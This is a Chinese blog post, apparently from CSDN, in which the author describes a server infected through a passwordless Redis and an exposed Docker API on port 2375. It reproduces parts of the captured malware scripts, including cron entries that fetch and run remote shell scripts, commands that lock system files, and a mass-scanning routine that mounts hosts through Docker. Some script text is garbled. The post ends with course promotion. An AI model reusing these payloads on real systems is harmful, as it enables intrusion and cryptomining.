今天在打开服务器准备进入docker中的mysql测试sqlmode时,突然发现进不去mysql,然后我一看,mysql挂了,不止mysql,其他应用也全挂了。
![](https://i-blog.csdnimg.cn/blog_migrate/163de273d564ee8347f4ce1667385875.png)
![](https://i-blog.csdnimg.cn/blog_migrate/01d11b57676e21a2c30e944c98b0bcde.png)
我一看,cpu100%,网上查找:kswapd0
占用过高是因为 物理内存不足,使用swap分区与内存换页操作交换数据,导致CPU占用过高。(后来我才领悟,原来这根本不是kswapd0
,而是木马程序伪装的[kswapd0]
,专门骗我这种小白)
![](https://i-blog.csdnimg.cn/blog_migrate/690d798f9fab409ad490aaecb8cafeb9.png)
可以看到2394这个进程占用cpu最多,于是我看了很久没查出什么问题,于是直接kill 2349
cpu降下来了。。。
可是我又发现还有一个进程9951 pnscan占用比较高,老规矩,打开百度搜一搜
![](https://i-blog.csdnimg.cn/blog_migrate/4e8ce5525223746b0334511f55317a7d.png)
好家伙,还没输完,百度就已经提示我pnscan木马了 于是我意识到服务器被病毒入侵了,立马去找杀毒方案 通过网络搜索,我大概知道是从redis入侵的了 查看刚刚的pnscan进程信息:
![](https://i-blog.csdnimg.cn/blog_migrate/2c6126a8ff0e82990431090989a4223b.png)
看到了熟悉的6379 ,确认从redis入侵无疑了,想起我的redis只是测试使用,所以没有设置密码。
发现pnscan相关进程,全部kill,然后根据上图中的路径删除/usr/local/bin目录下的pnscan脚本
rm -rfpnscan
当我删完,我以为就应该没事了,结果cpu还是占用很高
![](https://i-blog.csdnimg.cn/blog_migrate/12e3e26c0480d197f56445a405ef099c.png)
找了很多方法,还是无法解决
于是我无意间使用 netstat -ant
命令查看了一下网络连接状态
不查不知道,一查吓一跳
![](https://i-blog.csdnimg.cn/blog_migrate/3e5fc53cab4ba7112990c05ea52df053.png)
2375 ,好熟悉的端口,这不是我前天为了远程连接docker部署项目打开的吗。
一时间我悟了,原来病毒不止一个。
知己知彼百战不殆,于是我就去找到了这篇博文Docker暴露2375端口导致服务器被攻击解决方法!
只需要通过以下命令就可以操作你的docker
docker -H tcp://服务器ip:2375 docker命令
docker官网:
Warning: Changing the default docker daemon binding to a TCP port or Unix docker user group will increase your security risks by allowing non-root users to gain root access on the host. Make sure you control access to docker. If you are binding to a TCP port, anyone with access to that port has full Docker access; so it is not advisable on an open network.
告知了可能会被入侵。
解决办法:目前我先关掉了2375端口远程连接
我是通过修改vim /lib/systemd/system/docker.service
下图是我添加的,把它删掉
![](https://i-blog.csdnimg.cn/blog_migrate/b509414506d57dde5ab4c54aa12935cc.png)
然后执行
systemctl daemon-reload
```接着继续看\[scan\]进程
ps -ef |grep scan
进入/usr/share
目录,发现两个可疑的程序,为啥要这么明显?
![](https://i-blog.csdnimg.cn/blog_migrate/ca5e03d395920da5adb9088e91ea9254.png)
好奇心让我想看看这shell里面写的啥
[scan] 截取部分
#!/bin/bash
setenforce 0 2>/dev/null
ulimit -u 50000
sleep 1
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null
function SecureTheSystem(){
SYSFILEARRAY=(pstree kill pkill htop netstat ss lsofwget wge wdl curl cur cdl sysctl )
for SYSFILE in ${SYSFILEARRAY[@]}; do
SYSFILEBIN=which $SYSFILE
2>/dev/null 1>/dev/null
tntrecht -i $SYSFILEBIN 2>/dev/null 1>/dev/null
chattr -i $SYSFILEBIN 2>/dev/null 1>/dev/null
chmod -x $SYSFILEBIN 2>/dev/null 1>/dev/null
chattr +i $SYSFILEBIN 2>/dev/null 1>/dev/null
tntrecht +i $SYSFILEBIN 2>/dev/null 1>/dev/null
done
SYSTEMFILEARRAY=(“/root/.ssh/” “/home//.ssh/" “/etc/passwd” “/etc/shadow” “/etc/sudoers” “/etc/ssh/” “/etc/ssh/sshd_config”)
for SYSTEMFILE in ${SYSTEMFILEARRAY[@]}; do
tntrecht +i -R $SYSTEMFILE2>/dev/null 1>/dev/null
chattr +i -R $SYSTEMFILE2>/dev/null 1>/dev/null
done
}
sleep 1if [ -f “/bin/ps.original” ]thenps.original -fe|grep pnscan |grep -v grepelseps -fe|grep pnscan |grep -v grepfi
if [ $? -ne 0 ]
thenrm -rf .dat .shard .ranges .lan 2>/dev/nullsleep 1echo ‘config set dbfilename “backup.db”’ > .datecho ‘save’ >> .datecho ‘config set stop-writes-on-bgsave-error no’ >> .datecho ‘flushall’ >> .datecho 'set backup1 "\n\n\n/2 * * * * cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n”’ >> .datecho ‘set backup2 “\n\n\n*/3 * * * * wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n”’ >> .datecho ‘set backup3 “\n\n\n*/4 * * * * curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n”’ >> .datecho ‘set backup4 “\n\n\n*/5 * * * * wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n”’ >> .datecho ‘config set dir “/var/spool/cron/”’ >> .datecho ‘config set dbfilename “root”’ >> .datecho ‘save’ >> .datecho ‘config set dir “/var/spool/cron/crontabs”’ >> .datecho ‘save’ >> .datecho ‘flushall’ >> .datecho ‘set backup1 “\n\n\n*/2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n”’ >> .datecho ‘set backup2 “\n\n\n*/3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n”’ >> .datecho ‘set backup3 “\n\n\n*/4 * * * * root curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n”’ >> .datecho ‘set backup4 “\n\n\n*/5 * * * * root wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n”’ >> .datecho ‘config set dir “/etc/cron.d/”’ >> .datecho ‘config set dbfilename “zzh”’ >> .datecho ‘save’ >> .datecho ‘config set dir “/etc/”’ >> .datecho ‘config set dbfilename “crontab”’ >> .datecho ‘save’ >> .datsleep 1pnx=pnscan[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscanwhile true; do
\[mass\] 截取部分
#!/bin/bash
if [ -f /bin/cd1 ];then
aabb=/bin/cd1
echo “cd1 exist”
elif [ -f /bin/curl ];then
aabb=/bin/curl
echo “curl exist”
else
echo “curl not exist,use yum reinstall”
yum -y remove curl&&yum -y install curl
fi
chmod +x /usr/bin/zgrab
dAPIpwn(){
range=$1
port=$2
rate=
3
r
n
d
s
t
r
=
3 rndstr=
3rndstr=(head /dev/urandom | tr -dc a-z | head -c 6 ; echo ‘’)
eval “
r
n
d
s
t
r
"
=
"
′
rndstr"="'
rndstr"="′(masscan
r
a
n
g
e
−
p
range -p
range−pport --rate=$rate | awk ‘{print $6}’| zgrab --senders 200 --port $port --http=‘/v1.16/version’ --output-file=- 2>/dev/null | grep -E ‘ApiVersion|client version 1.16’ | jq -r .ip)'”;
for ipaddy in ${!rndstr}
do
TARGET= i p a d d y : ipaddy: ipaddy:port
echo ‘##################################################’
a
a
b
b
−
s
L
k
h
t
t
p
:
/
/
107..3.150
/
i
n
p
u
t
/
d
a
.
p
h
p
?
v
u
l
n
=
aabb -sLk http://107..3.150/input/da.php?vuln=
aabb−sLkhttp://107..3.150/input/da.php?vuln=TARGET -o /dev/null
echo $TARGET
timeout -s SIGKILL 240 docker -H $TARGET run --rm -v /:/mnt alpine chroot /mnt/ /bin/sh -c "if /etc/crontab && echo “* * * * * root curl https://i-blog.csdnimg.cn/blog_migrate/cc055d9abd4246cb8b3821375ad3fff8.png”>/etc/cron.d/zzh
done
}
额,看不太懂,可以看到的是对我的redis 6379和2375,2376端口都进行了入侵
既然已经备份下来了(后期再分析分析,知己知彼百战不殆嘛),那么就无情rm -rf 了
然后我top
发现有一个进程masscan,无论我怎样kill还是会重启
于是我查看定时任务cd /var/spool/cron/
,找到了原因
话不多说,记录下来之后rm -rf root
好家伙,还是又重启了
![](https://i-blog.csdnimg.cn/blog_migrate/3f63182fd9b89b9b9243be8a897bdbb6.png)
经过一段时间查询,搜索,我发现病毒进程不止masscan
利用Docker remote api未授权访问漏洞攻击,再利用ssh攻击传播,再安装IRC后门,文章提到的利用masscan,zgrab对外扫描占用宽带在上图中可以体现。
![](https://i-blog.csdnimg.cn/blog_migrate/b8615c00fbbc111dfdac6577aa4a1bb7.png)
![](https://i-blog.csdnimg.cn/blog_migrate/9b4eb64e4e631564a860c6fd59849b5d.png)
当我尝试修改yum的内容时,告诉我文件只读,然后我修改权限,发现没法修改权限
![](https://i-blog.csdnimg.cn/blog_migrate/467cab25f4332ec7ae745a9ddae7415b.png)
执行ls -l yum
—xr-xr-x. 1 root root 801 11月5 2018 yum
一番百度后:chattr -i yum
,再修改yum文件权限,好使了
修改一下yum解释器
我使用find命令查找masscan find -name masscan
,发现bin目录下的可执行文件,直接删除
![](https://i-blog.csdnimg.cn/blog_migrate/bc334d0f7b66e75e0f3171236773ba7a.png)
好家伙,我要哭了,[mass]又出现了,此刻我又发现了一个比较可疑的进程systemd-journal
,搜索一下,好家伙,和systemd-journald
就差一个字母,这玩意儿绝对是木马进程。
![](https://i-blog.csdnimg.cn/blog_migrate/c8b5219ea1f93f7958bead761392305a.png)
捣鼓了一段时间,还是无法彻底解决。然后我kill
掉这个进程,没了,接下来我就观察一下进程的变化,观察了很久都没有出现[mass],但docker容器已经被破坏了。
最后我重置了服务器,更换了Debian系统。
好像是没木马了一样,但是我的环境已经被破坏了,太难受了,系统安全真的很重要,我偶尔会听到朋友(这个朋友就是我)说数据库被黑,被勒索,系统被挖矿,其实这些都是可以避免的,在往后的学习工作中一定会更加注重系统安全,后续也会就该漏洞和病毒进一步学习研究,学习规避方案。
本次服务器被入侵的原因主要是因为redis没有设置密码和docker开启remote api之后没有进行相关验证,不法分子利用程序漏洞进行了攻击,虽然只是学习环境,但以后还是要加强一下安全方面的处理。
附上阿里云漏洞库链接:Docker daemon API 未授权访问漏洞
不过换个角度,我觉得自己又学到了很多知识,增长了经验,再重新搭一遍环境也正好可以巩固一下知识,欢迎大家评论留下宝贵的经验建议。
网络安全成长路线图
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成hei客大神,这个方向越往后,需要学习和掌握的东西就会越来越多,以下是学习网络安全需要走的方向:
# 网络安全学习方法
上面介绍了技术分类和学习路线,这里来谈一下学习方法:
## 视频学习
习网络安全需要走的方向:
# 网络安全学习方法
上面介绍了技术分类和学习路线,这里来谈一下学习方法:
## 视频学习
无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!